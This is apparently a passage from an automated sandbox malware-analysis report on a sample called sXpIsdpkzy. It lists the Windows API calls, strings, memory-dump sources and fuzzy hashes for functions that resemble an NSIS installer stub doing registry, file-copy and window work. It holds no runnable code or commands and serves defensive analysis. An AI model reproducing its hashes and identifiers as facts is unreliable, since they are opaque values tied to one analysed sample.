                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1912718029-0
                                                                                              • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                              • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                              • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                              APIs
                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • GlobalFree.KERNEL32(007B75D8), ref: 00402387
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3376005127-0
                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2568930968-0
                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s
                                                                                              • API String ID: 3540041739-3551169577
                                                                                              • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                              • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                              APIs
                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                              • API String ID: 1697273262-1764544995
                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                              • API String ID: 2577523808-3778932970
                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcatwsprintf
                                                                                              • String ID: %02x%c$...
                                                                                              • API String ID: 3065427908-1057055748
                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406902
                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1599320355-0
                                                                                              • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                              • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                              APIs
                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                              • String ID: Version
                                                                                              • API String ID: 512980652-315105994
                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                              • String ID:
                                                                                              • API String ID: 2102729457-0
                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                              • String ID:
                                                                                              • API String ID: 2883127279-0
                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
